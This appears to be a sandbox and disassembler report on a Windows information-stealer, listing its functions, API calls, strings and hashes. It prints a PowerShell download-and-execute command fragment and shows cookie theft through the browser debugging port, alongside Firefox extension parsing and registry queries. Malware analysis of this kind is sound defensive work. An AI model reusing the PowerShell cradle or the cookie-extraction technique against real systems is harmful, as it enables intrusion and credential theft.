                              • Opcode ID: 32a389403c35f4ef112d32f947fa70d93b6259d89cdd1abd242d0bbdc4396ac9
                              • Instruction ID: e98fd09026864aab0f070b26b02f2441cdc168c61c2dfcbbd1b44c05ec3b034b
                              • Opcode Fuzzy Hash: 32a389403c35f4ef112d32f947fa70d93b6259d89cdd1abd242d0bbdc4396ac9
                              • Instruction Fuzzy Hash: FCB19F309506169FCB21EF68E84CAAFBBB9AF40318F086428F995B7655DB35DD00CB91
                              Function 00E547E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,00E472A4), ref: 00E547E6
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 00E547FC
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00E5480D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00E5481E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 00E5482F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00E54840
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 00E54851
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 00E54862
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00E54873
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00E54884
                              • GetProcAddress.KERNEL32(00000000,send), ref: 00E54895
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 1e7f43110896668c55732681d5e0f6723b08bae2044d871e53f0553488a5099b
                              • Instruction ID: 054d204229caa934db3594434ac37b857296d8164f89744622074a3c680a1431
                              • Opcode Fuzzy Hash: 1e7f43110896668c55732681d5e0f6723b08bae2044d871e53f0553488a5099b
                              • Instruction Fuzzy Hash: 1411C972AD7B20AFD7309FF4BC0DA563AB8BA0A789704581BF5D1E2568D6FE4010DB50
                              Function 00E4BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4BE53
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4BE86
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E4BE91
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4BEB1
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E4BEBD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BEE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4BEEB
                              • lstrlen.KERNEL32(')"), ref: 00E4BEF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BF13
                              • lstrcat.KERNEL32(00000000,')"), ref: 00E4BF1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BF46
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E4BF66
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4BF88
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E4BF94
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BFBA
                              • ShellExecuteEx.SHELL32(?), ref: 00E4C00C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: 95aec44b8a3260ab25d4debc6e9e222a6bf4205f50aff3ea93ccccce5f0d8dde
                              • Instruction ID: 1aa385951e2841fdab0a3336fb1b540303ddc38fea79dbcc09ec591990a5129b
                              • Opcode Fuzzy Hash: 95aec44b8a3260ab25d4debc6e9e222a6bf4205f50aff3ea93ccccce5f0d8dde
                              • Instruction Fuzzy Hash: E461B371A103099FCB21AFB5AC8D6AE7BF8AF44308F146429F685F7241DB35D905CB91
                              Function 00E51820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5184F
                              • lstrlen.KERNEL32(00D16EC8), ref: 00E51860
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51887
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51892
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E518C1
                              • lstrlen.KERNEL32(00E64FA0), ref: 00E518D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E518F4
                              • lstrcat.KERNEL32(00000000,00E64FA0), ref: 00E51900
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5192F
                              • lstrlen.KERNEL32(00D16EE8), ref: 00E51945
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5196C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51977
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E519A6
                              • lstrlen.KERNEL32(00E64FA0), ref: 00E519B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E519D9
                              • lstrcat.KERNEL32(00000000,00E64FA0), ref: 00E519E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A14
                              • lstrlen.KERNEL32(00D16F08), ref: 00E51A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A51
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51A5C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51A8B
                              • lstrlen.KERNEL32(00D16F28), ref: 00E51AA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51AC8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51AD3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51B02
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: 1839b859c7691780776eb4f538b3ea4837e6610bc73a0ca8dd38ddcf0324273a
                              • Instruction ID: d10e2ce540791c019c4001ec583c5b072ac0fcc0a5cd93aca308b343a28dec77
                              • Opcode Fuzzy Hash: 1839b859c7691780776eb4f538b3ea4837e6610bc73a0ca8dd38ddcf0324273a
                              • Instruction Fuzzy Hash: 2D915E70600302DFDB30AFB9D888B1677E8AF44309F14A86DE9C6E7255DB39D845CB60
                              Function 00E44760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44793
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E447C5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44812
                              • lstrlen.KERNEL32(00E64B60), ref: 00E4481D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4483A
                              • lstrcat.KERNEL32(00000000,00E64B60), ref: 00E44846
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4486B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44898
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E448A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E448CA
                              • StrStrA.SHLWAPI(?,00000000), ref: 00E448DC
                              • lstrlen.KERNEL32(?), ref: 00E448F0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44931
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E449B8
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E449E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44A0A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44A30
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E44A5D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: ef3f848419894c1ed304fce74a6ccf2ede0b4272a80853c99fdca937143ce35c
                              • Instruction ID: 6c34fbf7e0c39bd7a050fbbb881c3453dcbeb3b6dbdb81d0dc6d8c1576c7dceb
                              • Opcode Fuzzy Hash: ef3f848419894c1ed304fce74a6ccf2ede0b4272a80853c99fdca937143ce35c
                              • Instruction Fuzzy Hash: CAB1A0B1A103069FCB21EF78E849A9E7BF5AF44304F156428FA85B7251DB34ED05CB90
                              Function 00E392B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E390C0: InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E390DF
                                • Part of subcall function 00E390C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E390FC
                                • Part of subcall function 00E390C0: InternetCloseHandle.WININET(00000000), ref: 00E39109
                              • strlen.MSVCRT ref: 00E392E1
                              • strlen.MSVCRT ref: 00E392FA
                                • Part of subcall function 00E38980: std::_Xinvalid_argument.LIBCPMT ref: 00E38996
                              • strlen.MSVCRT ref: 00E39399
                              • strlen.MSVCRT ref: 00E393E6
                              • lstrcat.KERNEL32(?,cookies), ref: 00E39547
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E39559
                              • lstrcat.KERNEL32(?,?), ref: 00E3956A
                              • lstrcat.KERNEL32(?,00E64B98), ref: 00E3957C
                              • lstrcat.KERNEL32(?,?), ref: 00E3958D
                              • lstrcat.KERNEL32(?,.txt), ref: 00E3959F
                              • lstrlen.KERNEL32(?), ref: 00E395B6
                              • lstrlen.KERNEL32(?), ref: 00E395DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E39614
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 9748f7415240f6c5fee6ad6b97b769a356a31b09a55ebd32bdb930573688ee64
                              • Instruction ID: 99d0aa6ae4e4442e6faef56a56fc77f2c206b4d994d615a15d9c87defd036c4e
                              • Opcode Fuzzy Hash: 9748f7415240f6c5fee6ad6b97b769a356a31b09a55ebd32bdb930573688ee64
                              • Instruction Fuzzy Hash: DEE13371E00218EFDF14DFA8D885ADEBBF5AF48300F1054A9E549B7282DB75AE45CB90
                              Function 00E4D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00E4D9A1
                              • memset.MSVCRT ref: 00E4D9B3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4D9DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4DA0E
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4DA1C
                              • lstrcat.KERNEL32(?,00D2F320), ref: 00E4DA36
                              • lstrcat.KERNEL32(?,?), ref: 00E4DA4A
                              • lstrcat.KERNEL32(?,00D2E030), ref: 00E4DA5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4DA8E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E4DA95
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4DAFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: 63b5be8cddb29464073e191612452096db07b72c2337161fe7d9a278e6767bea
                              • Instruction ID: 56a383affb452af5759f2b25b6040c0e1e1cb94e4be2d657046d12ea06a1339b
                              • Opcode Fuzzy Hash: 63b5be8cddb29464073e191612452096db07b72c2337161fe7d9a278e6767bea
                              • Instruction Fuzzy Hash: 4CB1B2719102199FDB20EFA4DC889EEBBB8EF48304F145969FA45F7241DB359E44CB50
                              Function 00E3B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3B330
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B37E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B3A9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3B3B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B3D9
                              • lstrlen.KERNEL32(00E64C50), ref: 00E3B450
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B474
                              • lstrcat.KERNEL32(00000000,00E64C50), ref: 00E3B480
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B4A9
                              • lstrlen.KERNEL32(00000000), ref: 00E3B52D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B557
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3B55F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B587
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E3B5FE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B622
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E3B62E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B65E
                              • lstrlen.KERNEL32(?), ref: 00E3B767
                              • lstrlen.KERNEL32(?), ref: 00E3B776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3B79E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: ab8a6048be784a768384a5323a4d6e1be4a53aedcc964e9475cd77d21cd6a1b1
                              • Instruction ID: 1053b2debfb1c6af6e776dc09c760051a031ea8e284faa0b80f850782b120257
                              • Opcode Fuzzy Hash: ab8a6048be784a768384a5323a4d6e1be4a53aedcc964e9475cd77d21cd6a1b1
                              • Instruction Fuzzy Hash: C3025270A01205CFCB25DF64D58DB6ABFF5AF44308F19906DE64AAB262D776DC42CB80
                              Function 00E53760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • RegOpenKeyExA.ADVAPI32(?,00D2C260,00000000,00020019,?), ref: 00E537BD
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00E537F7
                              • wsprintfA.USER32 ref: 00E53822
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00E53840
                              • RegCloseKey.ADVAPI32(?), ref: 00E5384E
                              • RegCloseKey.ADVAPI32(?), ref: 00E53858
                              • RegQueryValueExA.ADVAPI32(?,00D2F7B8,00000000,000F003F,?,?), ref: 00E538A1
                              • lstrlen.KERNEL32(?), ref: 00E538B6
                              • RegQueryValueExA.ADVAPI32(?,00D2F800,00000000,000F003F,?,00000400), ref: 00E53927
                              • RegCloseKey.ADVAPI32(?), ref: 00E53972
                              • RegCloseKey.ADVAPI32(?), ref: 00E53989
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
